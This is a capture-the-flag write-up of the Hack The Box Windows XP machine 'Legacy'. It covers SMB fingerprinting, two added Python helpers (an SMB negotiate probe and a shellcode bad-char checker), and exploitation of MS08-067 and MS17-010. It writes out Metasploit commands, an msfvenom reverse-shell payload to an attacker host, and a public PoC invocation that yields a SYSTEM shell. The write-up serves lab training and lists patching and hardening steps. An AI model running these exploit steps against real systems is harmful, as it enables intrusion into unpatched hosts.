- OS: Windows XP SP3
- Domain / vhosts: LEGACY (workgroup HTB)
Summary
Legacy is a Windows XP SP3 machine exposing SMB on ports 139 and 445 with no
patches applied. Both MS08-067 (CVE-2008-4250) and MS17-010 (CVE-2017-0143)
are present and confirmed by nmap scripts. Either exploit lands NT AUTHORITY\SYSTEM
immediately, because on XP the Server service runs in the SYSTEM context. There is
no separate user-to-root step — the single shell reads both flags.
The primary path used was Metasploit’s ms08_067_netapi. The module auto-fingerprinted
the target as “Windows XP SP3 English (AlwaysOn NX)” and handled the NX bypass via a
ROP chain, opening a cmd.exe reverse shell in under 10 seconds.
Recon
Parallel quick scan (top 100 ports + scripts) and full port scan:
nmap -sV -sC --top-ports 100 -oA nmap-quick <TARGET>
nmap -p- --min-rate 1000 -oA nmap-full <TARGET>
Quick scan output (relevant ports):
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
Host script results:
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY
| Workgroup: HTB
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
Full scan confirmed nothing else — only 135, 139, 445 open.
Two signals matter here: the OS banner says “Windows XP” and SMB2 negotiation failed outright. SMB2 was introduced in Vista; XP speaks only SMB1. These two facts together narrow the likely vulnerability class to MS08-067 and MS17-010 before touching a single script.
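The two signals above can be reproduced without nmap. An SMB1 NEGOTIATE that also offers the "SMB 2.002" dialect makes an SMB2-capable server (Vista and later) answer with an SMB2 header, while an SMB1-only host such as XP answers with an SMB1 header and picks an SMB1 dialect; the security-mode byte of that SMB1 reply is exactly what smb-security-mode decodes into authentication_level, challenge_response and message_signing. The probe below is an added example written for this writeup, not a tool from the original page or from nmap. The two sample replies it parses are constructed, not captures from Legacy, and the live negotiate() helper assumes direct-hosted SMB on 445 (port 139 would need a NetBIOS session request first).

```python
"""SMB dialect negotiation probe. Offer SMB1 dialects plus "SMB 2.002" in one
SMB1 NEGOTIATE and classify the reply: \xfeSMB means the server speaks SMB2,
\xffSMB means SMB1 only. Added example; sample replies below are constructed."""
import socket
import struct

SMB1_MAGIC = b"\xffSMB"
SMB2_MAGIC = b"\xfeSMB"
SMB_COM_NEGOTIATE = 0x72
# Order matters: the SMB1 reply names the chosen dialect by its index in this list.
DIALECTS = [b"PC NETWORK PROGRAM 1.0", b"LANMAN1.0", b"NT LM 0.12", b"SMB 2.002"]


def nb_wrap(payload):
    """Direct-hosted SMB framing (TCP/445): type 0x00 + 3-byte big-endian length."""
    return b"\x00" + len(payload).to_bytes(3, "big") + payload


def smb1_header(command, flags=0x18, flags2=0x4001, mid=1):
    """32-byte SMB1 header. flags 0x18 = canonical, case-insensitive paths.
    flags2 0x4001 = long names + NT status, deliberately without the Unicode and
    extended-security bits so the reply carries an OEM domain name and a raw
    challenge that this parser can read directly."""
    return struct.pack("<4sBIBHH8sHHHHH", SMB1_MAGIC, command, 0, flags, flags2,
                       0, b"\x00" * 8, 0, 0, 0, 0, mid)


def build_negotiate_request():
    """Client side of the exchange: WordCount 0, ByteCount, then the dialect strings."""
    body = b"".join(b"\x02" + d + b"\x00" for d in DIALECTS)
    return nb_wrap(smb1_header(SMB_COM_NEGOTIATE) + b"\x00"
                   + struct.pack("<H", len(body)) + body)


def parse_negotiate_response(packet):
    """Server side: classify the reply as SMB2 or SMB1 and decode the SMB1 fields."""
    if len(packet) < 8 or packet[0] != 0:
        raise ValueError("not a NetBIOS session message")
    smb = packet[4:4 + int.from_bytes(packet[1:4], "big")]
    if smb[:4] == SMB2_MAGIC:
        # 64-byte SMB2 header, then StructureSize(2), SecurityMode(2), DialectRevision(2)
        sec_mode, dialect = struct.unpack_from("<HH", smb, 66)
        return {"protocol": "SMB2", "dialect": f"0x{dialect:04x}",
                "message_signing": "required" if sec_mode & 0x02 else "supported"}
    if smb[:4] != SMB1_MAGIC:
        raise ValueError(f"unknown protocol magic {smb[:4]!r}")
    command, status = struct.unpack_from("<BI", smb, 4)
    if command != SMB_COM_NEGOTIATE or status != 0:
        raise ValueError(f"negotiate failed: command=0x{command:02x} status=0x{status:08x}")
    if smb[32] != 17:  # WordCount of the NT LM 0.12 response layout
        raise ValueError(f"unexpected WordCount {smb[32]}; server chose a pre-NT dialect")
    (dialect_index, sec_mode, _mpx, _vcs, _max_buf, _max_raw, _session_key,
     caps, _time, _tz, challenge_len) = struct.unpack_from("<HBHHIIIIQhB", smb, 33)
    byte_count = struct.unpack_from("<H", smb, 67)[0]
    data = smb[69:69 + byte_count]
    domain = data[challenge_len:].split(b"\x00", 1)[0].decode("latin-1")
    return {
        "protocol": "SMB1",
        "dialect": DIALECTS[dialect_index].decode() if dialect_index < len(DIALECTS) else None,
        # SecurityMode bits: 0x01 user-level, 0x02 challenge/response,
        # 0x04 signing enabled, 0x08 signing required (what smb-security-mode prints)
        "authentication_level": "user" if sec_mode & 0x01 else "share",
        "challenge_response": "supported" if sec_mode & 0x02 else "plaintext",
        "message_signing": ("required" if sec_mode & 0x08
                            else "supported" if sec_mode & 0x04 else "disabled"),
        "extended_security": bool(caps & 0x80000000),
        "challenge": data[:challenge_len].hex(),
        "domain": domain,
    }


def build_smb1_negotiate_response(dialect_index=2, sec_mode=0x03, caps=0x0000f3fd,
                                  domain=b"HTB", challenge=b"\x11\x22\x33\x44\x55\x66\x77\x88"):
    """Constructed SMB1 reply in NT LM 0.12 layout (sample data, not a capture)."""
    hdr = smb1_header(SMB_COM_NEGOTIATE, flags=0x18 | 0x80)  # 0x80 = reply bit
    words = struct.pack("<HBHHIIIIQhB", dialect_index, sec_mode, 50, 1, 16644, 65536,
                        0, caps, 0, 0, len(challenge))
    data = challenge + domain + b"\x00"
    return nb_wrap(hdr + b"\x11" + words + struct.pack("<H", len(data)) + data)


def build_smb2_negotiate_response(dialect=0x0202, sec_mode=0x01):
    """Constructed SMB2 reply (sample data): 64-byte header, then NEGOTIATE body."""
    hdr = struct.pack("<4sHHIHHIIQIIQ16s", SMB2_MAGIC, 64, 0, 0, 0, 1, 0x01, 0,
                      0, 0, 0, 0, b"\x00" * 16)
    body = struct.pack("<HHHH16sIIIIQQHHI", 65, sec_mode, dialect, 0, b"\x00" * 16,
                       0, 65536, 65536, 65536, 0, 0, 0, 0, 0)
    return nb_wrap(hdr + body)


def negotiate(host, port=445, timeout=5.0):
    """Run the exchange against a live host (direct-hosted SMB on 445 only)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_negotiate_request())
        head = s.recv(4)
        need = int.from_bytes(head[1:4], "big")
        body = b""
        while len(body) < need:
            chunk = s.recv(need - len(body))
            if not chunk:
                break
            body += chunk
    return parse_negotiate_response(head + body)


if __name__ == "__main__":
    import sys
    reply = (negotiate(sys.argv[1]) if len(sys.argv) > 1
             else parse_negotiate_response(build_smb1_negotiate_response()))
    for key, value in reply.items():
        print(f"{key}: {value}")
```

Run it with a target address to probe a live host, or without arguments to see the constructed XP-style reply decoded. A reply of protocol SMB1 with dialect NT LM 0.12 and message_signing disabled is the same picture nmap painted above; a protocol SMB2 reply rules out XP before any vuln script runs.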
Vuln script confirmation (quote the glob so the shell does not expand it against files in the working directory):
nmap --script 'smb-vuln-*' -p 135,139,445 -oA nmap-vuln <TARGET>
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
Both confirmed. MS08-067 is the more reliable path on XP: it is a user-mode stack overflow in the Server service with no kernel pool grooming to get right, so that is what the primary run used.
Foothold
MS08-067 via Metasploit
MS08-067 is a pre-authentication stack overflow in the NetprPathCanonicalize call of the
srvsvc RPC interface, served by the Server service over the \PIPE\browser named pipe (the
vulnerable canonicalization routine lives in netapi32.dll). XP accepts anonymous null-session
connections to IPC$, so no credentials are required: the overflow is triggered while the
service canonicalizes the attacker-supplied path, before it validates anything about the request.
use exploit/windows/smb/ms08_067_netapi
set RHOSTS <TARGET>
set LHOST <ATTACKER>
set LPORT 4443
set PAYLOAD windows/shell_reverse_tcp
exploit
MSF auto-detects the exact target variant from the SMB OS banner and selects the appropriate return address or ROP chain. In this run it identified “Windows XP SP3 English (AlwaysOn NX)” and handled the NX bypass via ROP gadgets in a loaded DLL at a fixed base address (ASLR does not exist on XP):
[*] <TARGET>:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] <TARGET>:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] <TARGET>:445 - Attempting to trigger the vulnerability...
[*] Command shell session 1 opened (<ATTACKER>:4443 -> <TARGET>:1033)
The shell opens as NT AUTHORITY\SYSTEM. No privilege escalation step exists — the
Server service on XP runs as SYSTEM, so the exploit context is already the highest
privilege level on the host.
User flag
Both flags are accessible from the single SYSTEM shell. The XP-era user home path
is C:\Documents and Settings\<username>\Desktop\ (Vista+ changed this to
C:\Users\):
C:\Documents and Settings\john\Desktop\user.txt
Privilege escalation
Not applicable. The MS08-067 exploit fires in the context of the Server service, which
runs as NT AUTHORITY\SYSTEM on Windows XP. Initial code execution is already the
highest privilege on the machine.
C:\Documents and Settings\Administrator\Desktop\root.txt
Manual MS08-067 path (for learning)
The public Python PoC (ExploitDB 7132, later modified versions on GitHub) takes a shellcode blob and a target index number. The bad-char list for the RPC packet is:
\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40
These bytes are terminators or characters the path-canonicalization routine treats specially, so any of them inside the shellcode corrupts it before the overflow fires. Generate shellcode avoiding them:
msfvenom -p windows/shell_reverse_tcp LHOST=<ATTACKER> LPORT=443 \
-b '\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40' \
-f python -v shellcode EXITFUNC=thread
EXITFUNC=thread matters: the shellcode runs inside the svchost.exe that hosts the Server
service, so an ExitProcess on shell exit would kill the service and block retries, whereas
ExitThread only ends the payload's own thread.
Target index 6 = “Windows XP SP3 English (NX)”, index 7 = “Windows XP SP3 English (AlwaysOn NX)”. Paste the generated shellcode into the PoC, start a listener on the LPORT used above, then:
python2 ms08_067.py <TARGET> 6
If 6 returns nothing, retry with 7, the variant Metasploit auto-selected in the primary run. A wrong target index can crash the Server service rather than fail quietly, after which the box needs a reset before any SMB exploit will work again.
Note: the public PoCs are Python 2. They use legacy impacket imports
(impacket.dcerpc instead of impacket.dcerpc.v5). Either install an old impacket
version in a venv or patch the import paths.
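Before pasting msfvenom output into the PoC it is worth confirming that the encoder really removed every byte in the bad-char list and that the blob is in the shape the script expects. The checker below is an added example, not part of the PoC or of the original page. The msfvenom text it parses is constructed sample data, not real shellcode; the variable name shellcode is the one the -v shellcode flag above produces, and the Python 2 string form it re-emits assumes the PoC reads a plain shellcode string, as the public versions do.

```python
"""Validate `msfvenom -f python -v shellcode` output before it goes into the
MS08-067 PoC: reassemble the bytes, look for surviving bad characters, and
re-emit the blob in Python 2 string form. Added example; SAMPLE_* are
constructed, not real shellcode."""
import re
import sys

# Bad characters for the NetprPathCanonicalize RPC packet (from the writeup).
BADCHARS = b"\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40"

# One msfvenom line: `name =  b""` or `name += b"\x..\x.."`, b-prefix optional.
_LINE = re.compile(r'^\s*(\w+)\s*\+?=\s*b?"((?:\\x[0-9a-fA-F]{2})*)"\s*$')


def parse_msfvenom_python(text, var="shellcode"):
    """Reassemble the byte string from msfvenom -f python output for `var`.
    Lines that are not assignments to `var` (comments, blank lines) are ignored."""
    buf = bytearray()
    for line in text.splitlines():
        m = _LINE.match(line)
        if m and m.group(1) == var:
            buf += bytes.fromhex(m.group(2).replace("\\x", ""))
    return bytes(buf)


def find_badchars(blob, badchars=BADCHARS):
    """Every (offset, byte) in blob that is on the bad-char list; empty means clean."""
    return [(i, b) for i, b in enumerate(blob) if b in badchars]


def to_python2_literal(blob, var="shellcode", width=16):
    """Emit the blob as the Python 2 `shellcode` assignment the PoC expects."""
    lines = [f'{var} = ""']
    for i in range(0, len(blob), width):
        chunk = "".join(f"\\x{b:02x}" for b in blob[i:i + width])
        lines.append(f'{var} += "{chunk}"')
    return "\n".join(lines)


def check(text, var="shellcode", badchars=BADCHARS):
    """Report length and bad-char hits for one msfvenom output."""
    blob = parse_msfvenom_python(text, var)
    hits = find_badchars(blob, badchars)
    return {"length": len(blob), "clean": not hits, "hits": hits}


# Constructed sample output: the bytes are arbitrary, not a working payload.
SAMPLE_OK = r'''shellcode =  b""
shellcode += b"\xda\xc1\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x52"
shellcode += b"\x83\xc3\x04\x31\x53\x13\x03\x53\x13"
'''
# Same shape with an 0x0a at offset 14, as a badly encoded run would look.
SAMPLE_BAD = r'''shellcode =  b""
shellcode += b"\xda\xc1\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x52"
shellcode += b"\x83\xc3\x04\x0a\x53"
'''

if __name__ == "__main__":
    # Usage: python3 check_shellcode.py msfvenom_output.txt
    src = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_BAD
    report = check(src)
    print(report)
    if report["clean"]:
        print(to_python2_literal(parse_msfvenom_python(src)))
    else:
        sys.exit(1)
```

Feed it the file msfvenom wrote; a non-zero exit with the offending offsets means the encoder did not converge and the msfvenom run should be repeated (or a different encoder chosen with -e), rather than debugging a dead RPC session.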
Alternative — MS17-010 EternalBlue
The target is also vulnerable to MS17-010 (EternalBlue is the Equation Group name for the
SMBv1 exploit that bulletin fixed). Metasploit's exploit/windows/smb/ms17_010_eternalblue
is written for 64-bit Windows 7 / Server 2008 R2 and later and does not list XP as a target.
On a 32-bit XP host use exploit/windows/smb/ms17_010_psexec, which is built on worawit's
zzz_exploit technique (see References): it uses the same SMBv1 transaction bug to obtain
SYSTEM-level access to the admin shares and then runs the payload psexec-style, with no kernel
pool grooming involved. It needs a named pipe a null session can open; \browser works on XP and
can be set explicitly with NAMEDPIPE if the module's automatic pipe check fails. Both paths
reach the same SYSTEM shell.
Why each step worked
Pre-auth RCE (MS08-067): The srvsvc NetprPathCanonicalize call is reachable via the
\PIPE\browser named pipe over a null session to IPC$. The canonicalization routine in
netapi32.dll overflows a stack buffer while processing the supplied path, so no credentials
are needed.
No ASLR on XP: Module base addresses are static. The ROP chain used to disable DEP (NX) for the process relies on gadgets at fixed addresses inside a loaded DLL. On any modern OS those addresses would be randomised, making a fixed-address chain useless without an information leak.
SYSTEM shell from SMB: srv.sys and the Server service that backs SMB on Windows
XP run under NT AUTHORITY\SYSTEM. Any code injected via the Server service inherits
that context — no separate escalation step is needed.
Counterfactuals
- Apply MS08-067 (KB958644, released out-of-band on 23 October 2008) and MS17-010 (March 2017; the XP build of that fix, KB4012598, was only published out-of-band in May 2017 after WannaCry).
- Disable SMBv1. On Windows 8 / Server 2012 and later that is Set-SmbServerConfiguration -EnableSMB1Protocol $false, and no modern client requires SMB1. XP has no SMB2 to fall back on, so there the equivalent is to stop the Server service or unbind File and Printer Sharing from the interface, which removes the 139/445 attack surface entirely.
- Block ports 139 and 445 at the network perimeter. SMB is not an internet-facing protocol.
- Upgrade from end-of-life Windows XP (EOL 8 April 2014). MS08-067 was fixed while XP was still supported, and the XP fix for MS17-010 only shipped as an emergency release; a supported OS receives both through routine patching.
Cleanup
No files were written to the target. The windows/shell_reverse_tcp payload runs entirely in
memory inside the svchost.exe that hosts the Server service; no dropper, stager binary, or
persistence mechanism was installed, and ending the session terminated the payload's thread.
Two caveats: the overflow has already corrupted that process's stack, so the service keeps
running in a state that is not a clean pre-exploit process image, and the SMB connection and
reverse shell are visible in any network logging on the path. "Pre-engagement state" here
means nothing changed on disk, not that the host is untouched.
Key Takeaways
- “Windows XP + SMB1 + ports 139/445” is as good as a vulnerability disclosure. Fingerprint → CVE lookup → exploit is the entire chain; no enumeration beyond nmap is required.
- The Metasploit auto-targeting for MS08-067 correctly identifies NX variants and applies the appropriate ROP chain. Understanding what it does (stack overflow → return into fixed-address gadgets that disable DEP → shellcode execution) is the skill that transfers to targets without a ready-made module.
- On Windows XP, any SMB RCE is a direct SYSTEM shell. Both flags live in the same session; there is no escalation step.
- Always run smb-vuln-ms08-067 and smb-vuln-ms17-010 together when SMB1 is present. Finding both positive on the same host is common on early HTB Windows boxes.
- EXITFUNC=thread in msfvenom shellcode prevents the SMB service from crashing on shell exit, preserving the ability to re-exploit if needed.
References
- Microsoft Security Bulletin MS08-067 (October 2008)
- Microsoft Security Bulletin MS17-010 (March 2017)
- 0xdf, “HTB: Legacy” — https://0xdf.gitlab.io/2019/02/21/htb-legacy.html
- IppSec, “Legacy” — https://ippsec.rocks/?#Legacy
- worawit/MS17-010 PoC — https://github.com/worawit/MS17-010